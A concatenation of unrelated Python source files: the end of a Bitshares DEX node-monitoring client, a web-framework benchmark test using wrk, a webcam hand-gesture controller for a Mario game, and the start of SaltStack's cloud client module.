currency_id = mode(currency_ids)
asset_precision = mode(asset_precisions)
currency_precision = mode(currency_precisions)
websocket.enableTrace(False)
print_market()
def spawn(): # multiprocessing handler
# initialize background bifurcation process
b_process = Process(target=bifurcation)
b_process.daemon = False
b_process.start()
# initialize multiple threshing processes
b = 0
c = 0
multinode = {}
for a in range(PROCESSES):
c += 1
multinode[str(a)] = Process(target=thresh, args=(a, b, c))
multinode[str(a)].daemon = False
multinode[str(a)].start()
time.sleep(BLIP)
# kill and respawn threshing processes periodically for durability
# even if anything gets hung metaNODE always moves on
while True:
b += 1
race_write(doc='metaNODElog.txt', text='')
for a in range(PROCESSES):
c += 1
time.sleep(TIMEOUT / 2 + TIMEOUT * random())
try:
multinode[str(a)].terminate()
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print('terminate() WARNING', msg)
race_append(doc='metaNODElog.txt', text=msg)
pass
try:
multinode[str(a)] = Process(target=thresh, args=(a, b, c))
multinode[str(a)].daemon = False
multinode[str(a)].start()
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print('process() WARNING', msg)
race_append(doc='metaNODElog.txt', text=msg)
pass
def thresh(process, epoch, pid): # make calls, shake out errors
# DATABASE CALLS
def dex_handshake(node):
start = time.time()
ws = websocket.create_connection(node, timeout=4)
handshake_latency = time.time() - start
if 0 > handshake_latency > 4:
raise ValueError('handshake_latency', handshake_latency)
return handshake_latency, ws
def dex_ping_latency(ws):
get_chain_id = Z + '"get_chain_id",[]]}'
start = time.time()
ws.send(get_chain_id)
chain_id = json.loads(ws.recv())['result']
ping_latency = time.time() - start
if chain_id != MAINNET:
raise ValueError('chain_id != MAINNET')
if 0 > ping_latency > 1:
raise ValueError('ping_latency', ping_latency)
return ping_latency
def dex_block_latency(ws):
get_dynamic_global_properties = Z + \
'"get_dynamic_global_properties",[]]}'
ws.send(get_dynamic_global_properties)
dynamic_global_properties = json.loads(ws.recv())['result']
blocktime = from_iso_date(dynamic_global_properties['time'])
block_latency = TZ + time.time() - blocktime
if 0 > block_latency > 6:
raise ValueError('blocktime is stale', block_latency)
return block_latency, blocktime
def dex_last(ws, currency, asset):
get_ticker = Z + \
'"get_ticker",["%s","%s","%s"]]}' % (
currency, asset, False)
ws.send(get_ticker)
ticker = json.loads(ws.recv())['result']
last = precision(ticker['latest'], 16)
if float(last) == 0:
raise ValueError('zero price last')
return last
def dex_market_history(ws, currency, asset, now, then, depth=100):
get_trade_history = Z + \
'"get_trade_history",["%s","%s","%s","%s","%s"]]}' % (
currency, asset, now, then, depth)
ws.send(get_trade_history)
trade_history = json.loads(ws.recv())['result']
history = []
for i in range(len(trade_history)):
unix = from_iso_date(trade_history[i]['date'])
price = precision(trade_history[i]['price'], 16)
if float(price) == 0:
raise ValueError('zero price in history')
amount = precision(
trade_history[i]['amount'], asset_precision)
history.append((unix, price, amount))
if not len(history):
raise ValueError('no history')
return history
def dex_account_balances(ws, account_name,
asset_ids=[],
asset_precisions=[]):
if '1.3.0' not in asset_ids:
asset_ids.append('1.3.0')
asset_precisions.append(5)
get_balances = Z + (
'"get_named_account_balances",["%s", [' %
account_name)
for i in range(len(asset_ids)):
get_balances += ('"' + asset_ids[i] + '",')
get_balances += ']]]}'
ws.send(get_balances)
ret = json.loads(ws.recv())['result']
balances = {}
for j in range(len(asset_ids)):
balances[asset_ids[j]] = 0
for j in range(len(asset_ids)):
for k in range(len(ret)):
if ret[k]['asset_id'] == asset_ids[j]:
balances[asset_ids[j]] += float(
ret[k]['amount'])/10**asset_precisions[j]
return balances
def dex_open_orders(ws, asset, asset_id, asset_precision,
currency, currency_id, currency_precision):
get_full_accounts = Z + \
'"get_full_accounts",[["%s",],%s]]}' % (
account_name, 'false')
# a databnase call to the api returns price as fraction
# with unreferenced decimal point locations on both amounts
# they're also reference by A.B.C instead of ticker symbol
time.sleep(BLIP)
ws.send(get_full_accounts)
ret = ws.recv()
BitPAIR = asset + ":" + currency
print (BitPAIR)
try:
limit_orders = json.loads(ret)['result'][0][1]['limit_orders']
except:
limit_orders = []
orders = []
for order in limit_orders:
orderNumber = order['id']
base_id = order['sell_price']['base']['asset_id']
quote_id = order['sell_price']['quote']['asset_id']
if ((base_id in [currency_id, asset_id]) and
(quote_id in [currency_id, asset_id])):
amount = float(order['for_sale'])
base_amount = float(order['sell_price']['base']['amount'])
quote_amount = float(order['sell_price']['quote']['amount'])
if base_id == currency_id:
base_precision = currency_precision
quote_precision = asset_precision
else:
base_precision = asset_precision
quote_precision = currency_precision
base_amount /= 10**base_precision
quote_amount /= 10**quote_precision
if base_id == asset_id:
orderType = 'sell'
price = quote_amount / base_amount
amount = (amount/10**base_precision)
else:
orderType = 'buy'
price = base_amount / quote_amount
amount = (amount/10**base_precision)/price
orders.append({'orderNumber': orderNumber,
'orderType': orderType,
'market': BitPAIR,
'amount': precision(amount, asset_precision),
'price': precision(price, 16)})
return sorted(orders, key=lambda k: k['price'])
def dex_book(ws, currency, asset, depth=3):
get_order_book = Z + \
'"get_order_book",["%s","%s","%s"]]}' % (
currency, asset, depth)
time.sleep(BLIP)
ws.send(get_order_book)
order_book = json.loads(ws.recv())['result']
askp = []
bidp = []
askv = []
bidv = []
for i in range(len(order_book['asks'])):
price = precision(order_book['asks'][i]['price'], 16)
if float(price) == 0:
raise ValueError('zero price in asks')
volume = precision(
order_book['asks'][i]['quote'], asset_precision)
askp.append(price)
askv.append(volume)
for i in range(len(order_book['bids'])):
price = precision(order_book['bids'][i]['price'], 16)
if float(price) == 0:
raise ValueError('zero price in bids')
volume = precision(
order_book['bids'][i]['quote'], asset_precision)
bidp.append(price)
bidv.append(volume)
if float(bidp[0]) >= float(askp[0]):
raise ValueError('mismatched orderbook')
return askp, bidp, askv, bidv
# THRESHING EVENT LOOP
while True:
try:
ws = 0
time.sleep(random())
# CHECK BLACK AND WHITE LISTS
black = race_read(doc='blacklist.txt')
white = race_read(doc='whitelist.txt')
shuffle(nodes)
node = nodes[0]
if node in black:
raise ValueError('blacklisted')
if node in white:
raise ValueError('whitelisted')
# connect to websocket
handshake_latency, ws = dex_handshake(node)
# use node a dozen times
for i in range(12):
time.sleep(PAUSE)
# Database calls
ping_latency = dex_ping_latency(ws)
block_latency, blocktime = dex_block_latency(ws)
last = dex_last(ws, currency, asset)
now = to_iso_date(time.time())
then = to_iso_date(time.time() - 3 * 86400)
history = dex_market_history(ws, currency, asset, now, then)
askp, bidp, askv, bidv = dex_book(ws, currency, asset, depth=3)
balances = dex_account_balances(ws, account_name,
asset_ids=[asset_id, currency_id],
asset_precisions=[asset_precision, currency_precision])
bts_balance = balances['1.3.0']
asset_balance = balances[asset_id]
currency_balance = balances[currency_id]
orders = dex_open_orders(ws, asset, asset_id, asset_precision,
currency, currency_id, currency_precision)
try:
import psutil # REQUIRES MODULE INSTALL
proc = psutil.Process()
descriptors = proc.num_fds()
cpu = '%.3f' % (float(os.popen('''grep 'cpu ' /proc/stat | awk '{usage=($2+$4)*100/($2+$4+$5)} END {print usage }' ''').readline()))
ram = '%.3f' % (100*float(proc.memory_percent()))
io = list(proc.io_counters())[:2]
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print(msg)
watchdog_latency = watchdog()
runtime = int(time.time()) - BEGIN
# in the event data passes all tests, then:
# print, winnow the node, and nascent trend the maven
print_market()
if (len(white) < WHITE) or (len(black) < BLACK):
alert = ' * building lists *'
else:
alert = ''
print('runtime ', runtime)
print('epoch ', epoch, 'pid', pid)
print('fds, processes ', descriptors, process, 'of', PROCESSES)
try:
print('cpu ram ', cpu , ram)
except:
pass
try:
print('read write ', io)
except:
pass
print('node ', node)
print('total:white:black', node_count, len(white), len(black), alert)
print('')
print('block latency ', ('%.3f' % block_latency))
print('handshake ', ('%.3f' % handshake_latency))
print('ping ', ('%.3f' % ping_latency))
print('')
print('bitshares ', bts_balance, 'BTS')
print('currency ', currency_balance, currency)
print('assets ', asset_balance, asset)
print('')
print('last ', ('%.16f' % float(last)))
print('')
print('history depth ', len(history))
for i in range(3):
print(history[i])
print('')
print('asks depth ', len(askp))
for i in range(3):
print(askp[i], askv[i])
print('bids depth ', len(bidp))
for i in range(3):
print(bidp[i], bidv[i])
print('')
print('open orders ', len(orders))
for order in orders:
print(order)
print('')
print('watchdog latency:', watchdog_latency)
print('')
# winnow whitelist the node and nascent trend the maven
maven = {}
maven['bidv'] = bidv
maven['askv'] = askv
maven['bidp'] = bidp
maven['askp'] = askp
maven['bts_balance'] = bts_balance
maven['currency_balance'] = currency_balance
maven['asset_balance'] = asset_balance
maven['market_history'] = history
maven['orders'] = orders
maven['last'] = last
maven['whitelist'] = white
maven['blacklist'] = black
maven['blocktime'] = blocktime
nascent_trend(maven)
winnow('whitelist', node)
try:
time.sleep(BLIP)
ws.close()
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print(msg)
pass
continue
except Exception as e:
try:
time.sleep(BLIP)
ws.close()
except:
pass
msg = str(type(e).__name__) + str(e.args) + node
if (('ValueError' not in msg) and
('StatisticsError' not in msg) and
('result' not in msg) and
('timeout' not in msg) and
('SSL' not in msg) and
('WebSocketTimeoutException' not in msg) and
('WebSocketBadStatusException' not in msg) and
('WebSocketAddressException' not in msg) and
('ConnectionResetError' not in msg) and
('ConnectionRefusedError' not in msg)) :
msg += '\n'+ str(traceback.format_exc())
print(msg)
if 'listed' not in msg:
race_append(doc='metaNODElog.txt', text=msg)
winnow('blacklist', node)
continue
call = call.replace("'", '"') # never use single quotes
def winnow(x, node): # seperate good nodes from bad
if x == 'blacklist':
black = race_read(doc='blacklist.txt')
if isinstance(black, list):
if node in black:
black.remove(node)
black.append(node)
black = black[-BLACK:]
race_write(doc='blacklist.txt', text=black)
else:
race_write(doc='blacklist.txt', text=[node])
if x == 'whitelist':
white = race_read(doc='whitelist.txt')
if isinstance(white, list):
if node in white:
white.remove(node)
white.append(node)
white = white[-WHITE:]
race_write(doc='whitelist.txt', text=white)
else:
race_write(doc='whitelist.txt', text=[node])
def nascent_trend(maven): # append latest data
mavens = race_read(doc='mavens.txt')
if isinstance(mavens, list):
mavens.append(str(maven))
mavens = mavens[-MAVENS:]
race_write(doc='mavens.txt', text=mavens)
else:
race_write(doc='mavens.txt', text=[str(maven)])
def bifurcation(): # statistically curate data
while True:
try:
time.sleep(1)
mavens = race_read(doc='mavens.txt')
l = len(mavens)
# initialize lists to sort data from each maven by key
bidp = []
askp = []
bidv = []
askv = []
bts_balance = []
currency_balance = []
asset_balance = []
history = []
last = []
whitelist = []
blacklist = []
blocktime = []
orders = []
# initialize the metaNODE dictionary
metaNODE = {}
# sort maven data for statistical analysis by key
for i in range(len(mavens)):
maven = literal(mavens[i])
bts_balance.append(maven['bts_balance'])
currency_balance.append(maven['currency_balance'])
asset_balance.append(maven['asset_balance'])
last.append(maven['last'])
blocktime.append(maven['blocktime'])
whitelist.append(maven['whitelist'])
blacklist.append(maven['blacklist'])
# stringify lists for statistical mode
bidp.append(str(maven['bidp']))
askp.append(str(maven['askp']))
bidv.append(str(maven['bidv']))
askv.append(str(maven['askv']))
history.append(str(maven['market_history']))
orders.append(str(maven['orders']))
# find the oldest bitshares blocktime in our dataset
blocktime = min(blocktime)
# get the mode of the mavens for each metric
# allow 1 or 2 less than total & most recent for mode
# accept "no mode" statistics error as possibility
try:
bts_balance = mode(bts_balance)
except:
try:
bts_balance = mode(bts_balance[-(l-1):])
except:
bts_balance = mode(bts_balance[-(l-2):])
try:
currency_balance = mode(currency_balance)
except:
try:
currency_balance = mode(currency_balance[-(l-1):])
except:
currency_balance = mode(currency_balance[-(l-2):])
try:
asset_balance = mode(asset_balance)
except:
try:
asset_balance = mode(asset_balance[-(l-1):])
except:
asset_balance = mode(asset_balance[-(l-2):])
try:
last = mode(last)
except:
try:
last = mode(last[-(l-1):])
except:
last = mode(last[-(l-2):])
try:
bidp = literal(mode(bidp))
except:
try:
bidp = literal(mode(bidp[-(l-1):]))
except:
bidp = literal(mode(bidp[-(l-2):]))
try:
askp = literal(mode(askp))
except:
try:
askp = literal(mode(askp[-(l-1):]))
except:
askp = literal(mode(askp[-(l-2):]))
try:
bidv = literal(mode(bidv))
except:
try:
bidv = literal(mode(bidv[-(l-1):]))
except:
bidv = literal(mode(bidv[-(l-2):]))
try:
askv = literal(mode(askv))
except:
try:
askv = literal(mode(askv[-(l-1):]))
except:
askv = literal(mode(askv[-(l-2):]))
try:
history = literal(mode(history))
except:
try:
history = literal(mode(history[-(l-1):]))
except:
history = literal(mode(history[-(l-2):]))
try:
orders = literal(mode(orders))
except:
try:
orders = literal(mode(orders[-(l-1):]))
except:
orders = literal(mode(orders[-(l-2):]))
# attempt a full whitelist and blacklist
wl = []
for i in whitelist:
wl += i
whitelist = list(set(wl))[-WHITE:]
bl = []
for i in blacklist:
bl += i
blacklist = list(set(bl))[-BLACK:]
# rebuild orderbook as 4 key dict with lists of floats
bidp = [float(i) for i in bidp]
bidv = [float(i) for i in bidv]
askp = [float(i) for i in askp]
askv = [float(i) for i in askv]
book = {'bidp':bidp, 'bidv':bidv, 'askp':askp, 'askv':askv}
# if you made it this far without statistics error
# truncate and rewrite the metaNODE with curated data
metaNODE['book'] = book
metaNODE['bts_balance'] = float(bts_balance)
metaNODE['currency_balance'] = float(currency_balance)
metaNODE['asset_balance'] = float(asset_balance)
metaNODE['history'] = history #LIST
metaNODE['orders'] = orders #LIST
metaNODE['last'] = float(last)
metaNODE['whitelist'] = whitelist #LIST
metaNODE['blacklist'] = blacklist #LIST
metaNODE['blocktime'] = float(blocktime)
metaNODE['account_name'] = account_name #STRING
metaNODE['account_id'] = account_id #STRING A.B.C
metaNODE['asset'] = asset #STRING SYMBOL
metaNODE['asset_id'] = asset_id #STRING A.B.C
metaNODE['asset_precision'] = int(asset_precision)
metaNODE['currency'] = currency #STRING SYMBOL
metaNODE['currency_id'] = currency_id #STRING A.B.C
metaNODE['currency_precision'] = int(currency_precision)
# solitary process with write access to metaNODE.txt
race_write(doc='metaNODE.txt', text=metaNODE)
print ('metaNODE.txt updated')
except Exception as e: # wait a second and try again
# common msg is "no mode statistics error"
msg = str(type(e).__name__) + str(e.args)
print(msg)
race_append(doc='metaNODElog.txt', text=msg)
continue # from top of while loop NOT pass through error
# HELPER FUNCTIONS
# ======================================================================
def bell(duration=2, frequency=432): # Activate linux audible bell
pass
'''
os.system('play --no-show-progress --null --channels 1 synth' +
' %s sine %f' % (duration*1000, frequency))
'''
def gmail():
pass
'''
send_to = "THE EMAIL ADDRESS TO SEND TO"
send_from = "YOUR EMAIL ADDRESS"
pass = "YOUR PASSWORD"
msg = "YOUR MESSAGE!"
import smtplib
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(send_from, pass)
server.sendmail(send_from, send_to, msg)
server.quit()
'''
def to_iso_date(unix): # returns iso8601 datetime given unix epoch
return datetime.utcfromtimestamp(int(unix)).isoformat()
def from_iso_date(date): # returns unix epoch given iso8601 datetime
return int(time.mktime(time.strptime(str(date),
'%Y-%m-%dT%H:%M:%S')))
def precision(x, n): # string representation of float to n decimal places
return ('%.' + str(n) + 'f') % float(x)
def print_market(): # terminal header with cached values
print("\033c")
logo()
print('')
print(time.ctime())
print('=======================================')
print('account ', account_name, account_id)
print('currency ', currency, currency_id, currency_precision)
print('asset ', asset, asset_id, asset_precision)
print('=======================================')
print('')
def welcome():
version()
print("\033c")
logo()
banner()
time.sleep(3)
for i in range(5):
print("\033c")
logo()
time.sleep(0.5)
def logo():
def wxyz():
a = 'abcdef1234567890'
b = ''
for i in range(17):
b = str(b + r'\x' + choice(a) + choice(a))
return b
w,x,y,z = wxyz(),wxyz(),wxyz(),wxyz()
print(w)
print(x)
print(
''' ____ _____ ___ ______ ________
Bitshares Trustless Client (_ \(_ _).' `.(_ _ `.(_ __ \
__ __ ____ ____ __ | \ | | / .-. \ | | `. \ | |_ \_|
( \/ )( ___)(_ _) / \ | |\ \| | | | | | | | | | | _) _
) ( | __) || / <> \ _| |_\ |_\ `-' /_| |_.' /_| |__/ |
(_/\/\_)(____) (__)(__)(__)(_____|\____)`.___.'(______.'(________/
''' + version)
print(y)
print(z)
def version():
global VERSION, version
version = 'v0.00000011'
VERSION = 'metaNODE ' + version + ' - Bitshares Trustless Client'
sys.stdout.write('\x1b]2;' + VERSION + '\x07') # terminal #title
def main(): # script primary backbone
controls()
welcome()
initialize()
public_nodes()
constants()
sign_in()
cache()
spawn()
if __name__ == "__main__":
main()
|
bench_apps.py
|
"""
Benchmark different servers
"""
import os
import time
import pytest
import requests
import subprocess
from functools import wraps
from multiprocessing import Process
from pytest_cov.embed import cleanup_on_sigterm
from web.core.http import Handler
cleanup_on_sigterm()
BASE = os.path.dirname(__file__)
HELLO_WORLD = 'Hello World!'
with open(os.path.join(BASE, 'templates', 'landing.html'), 'r') as f:
LANDING_PAGE = f.read()
STATIC_PATH = os.path.join(BASE, '..', 'docs')
with open(os.path.join(STATIC_PATH, 'data-binding.gif'), 'rb') as f:
STATIC_FILE = f.read()
# Expected responses
RESPONSES = {
'/': HELLO_WORLD,
'/landing': LANDING_PAGE,
'/static/data-binding.gif': STATIC_FILE
}
def aiohttp_app(port):
""" Without logging...
Running 30s test @ http://127.0.0.1:8888/
12 threads and 400 connections
Thread Stats Avg Stdev Max +/- Stdev
Latency 89.37ms 6.68ms 290.76ms 89.18%
Req/Sec 369.61 80.32 666.00 83.37%
132444 requests in 30.04s, 20.59MB read
Requests/sec: 4408.86
Transfer/sec: 701.81KB
"""
from web.apps.aiohttp_app import AiohttpApplication
class Home(Handler):
async def get(self, request, response):
response.body = HELLO_WORLD
return response
class Landing(Handler):
async def get(self, request, response):
response.body = LANDING_PAGE
return response
app = AiohttpApplication()
app.add_route('/', Home())
app.add_route('/landing', Landing())
app.add_static_route('/static/', STATIC_PATH)
app.timed_call(31000, app.stop)
app.start(port=port)
def sanic_app(port):
""" With logging
Running 30s test @ http://127.0.0.1:8888/
12 threads and 400 connections
Thread Stats Avg Stdev Max +/- Stdev
Latency 62.65ms 10.04ms 189.96ms 87.87%
Req/Sec 526.93 159.98 1.00k 64.25%
188860 requests in 30.06s, 23.41MB read
Requests/sec: 6283.35
Transfer/sec: 797.69KB
"""
from web.apps.sanic_app import SanicApplication
from sanic import Sanic, response
app = SanicApplication()
class Home(Handler):
async def get(self, request, response):
response.body = HELLO_WORLD.encode()
return response
class Landing(Handler):
async def get(self, request, response):
response.body = LANDING_PAGE.encode()
return response
app.add_route('/', Home())
app.add_route('/landing', Landing())
app.add_static_route('/static', STATIC_PATH)
app.timed_call(31000, app.stop)
app.start(port=port)
def falcon_app(port):
""" With logging
Running 30s test @ http://127.0.0.1:8888/
12 threads and 400 connections
Thread Stats Avg Stdev Max +/- Stdev
Latency 62.65ms 10.04ms 189.96ms 87.87%
Req/Sec 526.93 159.98 1.00k 64.25%
188860 requests in 30.06s, 23.41MB read
Requests/sec: 6283.35
Transfer/sec: 797.69KB
"""
from web.apps.falcon_app import FalconApplication
app = FalconApplication()
class Home(Handler):
def get(self, req, resp):
resp.body = HELLO_WORLD
class Landing(Handler):
def get(self, req, resp):
resp.body = LANDING_PAGE
app.add_route('/', Home())
app.add_route('/landing', Landing())
app.add_static_route('/static', STATIC_PATH)
#app.timed_call(31000, app.stop) # Does not work
app.start(port=port)
def flask_app(port):
""" With logging
Running 30s test @ http://127.0.0.1:8888/
12 threads and 400 connections
Thread Stats Avg Stdev Max +/- Stdev
Latency 62.65ms 10.04ms 189.96ms 87.87%
Req/Sec 526.93 159.98 1.00k 64.25%
188860 requests in 30.06s, 23.41MB read
Requests/sec: 6283.35
Transfer/sec: 797.69KB
"""
from web.apps.flask_app import FlaskApplication
from flask import Flask
app = FlaskApplication()
def home():
return HELLO_WORLD
def landing():
return LANDING_PAGE
app.add_route('/', home)
app.add_route('/landing', landing)
app.add_static_route('/static', STATIC_PATH)
app.timed_call(31000, app.stop)
app.start(port=port)
def tornado_app(port):
""" Even without logging it's slower!
Running 30s test @ http://127.0.0.1:8888/
12 threads and 400 connections
Thread Stats Avg Stdev Max +/- Stdev
Latency 179.14ms 26.19ms 464.63ms 92.60%
Req/Sec 184.55 107.47 560.00 57.59%
64871 requests in 30.10s, 12.87MB read
Requests/sec: 2155.42
Transfer/sec: 437.82KB
with logging
Running 30s test @ http://127.0.0.1:8888/
12 threads and 400 connections
Thread Stats Avg Stdev Max +/- Stdev
Latency 209.77ms 28.48ms 320.47ms 91.43%
Req/Sec 156.14 79.60 500.00 63.72%
55415 requests in 30.10s, 10.99MB read
Requests/sec: 1841.04
Transfer/sec: 373.96KB
"""
import tornado.web
from web.apps.tornado_app import TornadoApplication
from tornado.log import enable_pretty_logging
enable_pretty_logging()
app = TornadoApplication()
class Home(Handler):
def get(self, req, resp):
resp.write(HELLO_WORLD)
resp.finish()
class Landing(Handler):
def get(self, req, resp):
resp.write(LANDING_PAGE)
resp.finish()
app.add_route('/', Home())
app.add_route('/landing', Landing())
app.add_static_route('/static', STATIC_PATH)
app.timed_call(31000, app.stop)
app.start(port=port)
def twisted_app(port):
""" With logging
Running 30s test @ http://127.0.0.1:8888/
12 threads and 400 connections
Thread Stats Avg Stdev Max +/- Stdev
Latency 124.17ms 24.74ms 492.40ms 85.64%
Req/Sec 245.94 80.01 0.86k 66.42%
87585 requests in 30.05s, 11.78MB read
Requests/sec: 2914.22
Transfer/sec: 401.27KB
"""
from twisted.web import server
from twisted.web.resource import Resource
from twisted.web.static import File
from web.apps.twisted_app import TwistedApplication
class Main(Resource):
def getChild(self, name, request):
name = name.decode()
if name == '':
return self
return self.children[name]
def render_GET(self, request):
return HELLO_WORLD.encode()
class Landing(Resource):
isLeaf = True
def render_GET(self, request):
return LANDING_PAGE.encode()
root = Main()
root.putChild('landing', Landing())
root.putChild('static', File(STATIC_PATH))
site = server.Site(root)
app = TwistedApplication(port=port, site=site)
app.timed_call(31000, app.stop)
app.start()
def vibora_app(port):
""" With logging
"""
from web.apps.vibora_app import ViboraApplication
from vibora import Request, Response
app = ViboraApplication()
class AsyncHandler(Handler):
async def __call__(self, request: Request) -> Response:
return super().__call__(request)
class Home(AsyncHandler):
async def get(self, request, response):
return Response(HELLO_WORLD.encode())
class Landing(AsyncHandler):
async def get(self, request, response):
return Response(LANDING_PAGE.encode())
app.add_static_route('/static', STATIC_PATH)
app.add_route('/', Home())
app.add_route('/landing', Landing())
app.timed_call(31000, app.stop)
app.start(port=port)
def clip(s, n=100):
if len(s) <= n:
return s
return s[:n]
@pytest.mark.parametrize('server, route', [
(server, route)
for server in (
#aiohttp_app,
#sanic_app, # Sanic is a memory hog and keeps killing my laptop
#falcon_app,
#tornado_app,
#twisted_app,
vibora_app,
)
for route in RESPONSES.keys()
])
def test_benchmarks(capsys, server, route):
port = 8888
url = 'http://127.0.0.1:{}{}'.format(port, route)
benchmark = 'wrk -t12 -c400 -d30s {}'.format(url)
p = Process(target=server, args=(port,))
p.start()
try:
time.sleep(1)
# Make sure the page is actually what we expect
r = requests.get(url)
if not r.ok:
with capsys.disabled():
print(clip(r.content, 100))
assert r.ok
if 'static' in route:
assert r.content == RESPONSES[route]
else:
assert r.content.decode() == RESPONSES[route]
# Run wrk
results = subprocess.check_output(benchmark.split())
with capsys.disabled():
print("\n---------------------")
for line in results.split(b"\n"):
print(line.decode())
print("---------------------")
finally:
p.join(5)
if p.is_alive():
p.terminate()
p.join(1)
time.sleep(2)
if __name__ == '__main__':
vibora_app(8888)
|
mario.py
|
import tensorflow as tf
import cv2
import multiprocessing as _mp
from src.utils import load_graph, mario, detect_hands, predict
from src.config import ORANGE, RED, GREEN
tf.flags.DEFINE_integer("width", 640, "Screen width")
tf.flags.DEFINE_integer("height", 480, "Screen height")
tf.flags.DEFINE_float("threshold", 0.6, "Threshold for score")
tf.flags.DEFINE_float("alpha", 0.3, "Transparent level")
tf.flags.DEFINE_string("pre_trained_model_path", "src/pretrained_model.pb", "Path to pre-trained model")
FLAGS = tf.flags.FLAGS
def main():
graph, sess = load_graph(FLAGS.pre_trained_model_path)
cap = cv2.VideoCapture(0)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, FLAGS.width)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, FLAGS.height)
mp = _mp.get_context("spawn")
v = mp.Value('i', 0)
lock = mp.Lock()
process = mp.Process(target=mario, args=(v, lock))
process.start()
while True:
key = cv2.waitKey(10)
if key == ord("q"):
break
_, frame = cap.read()
frame = cv2.flip(frame, 1)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
boxes, scores, classes = detect_hands(frame, graph, sess)
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
results = predict(boxes, scores, classes, FLAGS.threshold, FLAGS.width, FLAGS.height)
if len(results) == 1:
x_min, x_max, y_min, y_max, category = results[0]
x = int((x_min + x_max) / 2)
y = int((y_min + y_max) / 2)
cv2.circle(frame, (x, y), 5, RED, -1)
if category == "Open" and x <= FLAGS.width / 3:
action = 7 # Left jump
text = "Jump left"
elif category == "Closed" and x <= FLAGS.width / 3:
action = 6 # Left
text = "Run left"
elif category == "Open" and FLAGS.width / 3 < x <= 2 * FLAGS.width / 3:
action = 5 # Jump
text = "Jump"
elif category == "Closed" and FLAGS.width / 3 < x <= 2 * FLAGS.width / 3:
action = 0 # Do nothing
text = "Stay"
elif category == "Open" and x > 2 * FLAGS.width / 3:
action = 2 # Right jump
text = "Jump right"
elif category == "Closed" and x > 2 * FLAGS.width / 3:
action = 1 # Right
text = "Run right"
else:
action = 0
text = "Stay"
with lock:
v.value = action
cv2.putText(frame, "{}".format(text), (x_min, y_min - 5),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, GREEN, 2)
overlay = frame.copy()
cv2.rectangle(overlay, (0, 0), (int(FLAGS.width / 3), FLAGS.height), ORANGE, -1)
cv2.rectangle(overlay, (int(2 * FLAGS.width / 3), 0), (FLAGS.width, FLAGS.height), ORANGE, -1)
cv2.addWeighted(overlay, FLAGS.alpha, frame, 1 - FLAGS.alpha, 0, frame)
cv2.imshow('Detection', frame)
cap.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
main()
|
__init__.py
|
"""
The top level interface used to translate configuration data back to the
correct cloud modules
"""
import copy
import glob
import logging
import multiprocessing
import os
import signal
import sys
import time
import traceback
from itertools import groupby
import salt.client
import salt.config
import salt.loader
import salt.syspaths
import salt.utils.args
import salt.utils.cloud
import salt.utils.context
import salt.utils.crypt
import salt.utils.data
import salt.utils.dictupdate
import salt.utils.files
import salt.utils.user
import salt.utils.verify
import salt.utils.yaml
from salt.exceptions import (
SaltCloudConfigError,
SaltCloudException,
SaltCloudNotFound,
SaltCloudSystemExit,
)
from salt.template import compile_template
try:
import Cryptodome.Random
except ImportError:
try:
import Crypto.Random
except ImportError:
pass # pycrypto < 2.1
log = logging.getLogger(__name__)
def communicator(func):
"""Warning, this is a picklable decorator !"""
def _call(queue, args, kwargs):
"""called with [queue, args, kwargs] as first optional arg"""
kwargs["queue"] = queue
ret = None
try:
ret = func(*args, **kwargs)
queue.put("END")
except KeyboardInterrupt as ex:
trace = traceback.format_exc()
queue.put("KEYBOARDINT")
queue.put("Keyboard interrupt")
queue.put("{}\n{}\n".format(ex, trace))
except Exception as ex: # pylint: disable=broad-except
trace = traceback.format_exc()
queue.put("ERROR")
queue.put("Exception")
queue.put("{}\n{}\n".format(ex, trace))
except SystemExit as ex:
trace = traceback.format_exc()
queue.put("ERROR")
queue.put("System exit")
queue.put("{}\n{}\n".format(ex, trace))
return ret
return _call
def enter_mainloop(
target,
mapped_args=None,
args=None,
kwargs=None,
pool=None,
pool_size=None,
callback=None,
queue=None,
):
"""
Manage a multiprocessing pool
- If the queue does not output anything, the pool runs indefinitely
- If the queue returns KEYBOARDINT or ERROR, this will kill the pool
totally calling terminate & join and ands with a SaltCloudSystemExit
exception notifying callers from the abnormal termination
- If the queue returns END or callback is defined and returns True,
it just join the process and return the data.
target
the function you want to execute in multiprocessing
pool
pool object can be None if you want a default pool, but you ll
have then to define pool_size instead
pool_size
pool size if you did not provide yourself a pool
callback
a boolean taking a string in argument which returns True to
signal that 'target' is finished and we need to join
the pool
queue
A custom multiprocessing queue in case you want to do
extra stuff and need it later in your program
args
positional arguments to call the function with
if you don't want to use pool.map
mapped_args
a list of one or more arguments combinations to call the function with
e.g. (foo, [[1], [2]]) will call::
foo([1])
foo([2])
kwargs
kwargs to give to the function in case of process
Attention, the function must have the following signature:
target(queue, *args, **kw)
You may use the 'communicator' decorator to generate such a function
(see end of this file)
"""
if not kwargs:
kwargs = {}
if not pool_size:
pool_size = 1
if not pool:
pool = multiprocessing.Pool(pool_size)
if not queue:
manager = multiprocessing.Manager()
queue = manager.Queue()
if mapped_args is not None and not mapped_args:
msg = (
"We are called to asynchronously execute {}"
" but we do no have anything to execute, weird,"
" we bail out".format(target)
)
log.error(msg)
raise SaltCloudSystemExit("Exception caught\n{}".format(msg))
elif mapped_args is not None:
iterable = [[queue, [arg], kwargs] for arg in mapped_args]
ret = pool.map(func=target, iterable=iterable)
else:
ret = pool.apply(target, [queue, args, kwargs])
while True:
test = queue.get()
if test in ["ERROR", "KEYBOARDINT"]:
type_ = queue.get()
trace = queue.get()
msg = "Caught {}, terminating workers\n".format(type_)
msg += "TRACE: {}\n".format(trace)
log.error(msg)
pool.terminate()
pool.join()
raise SaltCloudSystemExit("Exception caught\n{}".format(msg))
elif test in ["END"] or (callback and callback(test)):
pool.close()
pool.join()
break
else:
time.sleep(0.125)
return ret
class CloudClient:
"""
The client class to wrap cloud interactions
"""
def __init__(self, path=None, opts=None, config_dir=None, pillars=None):
if opts:
self.opts = opts
else:
self.opts = salt.config.cloud_config(path)
# Check the cache-dir exists. If not, create it.
v_dirs = [self.opts["cachedir"]]
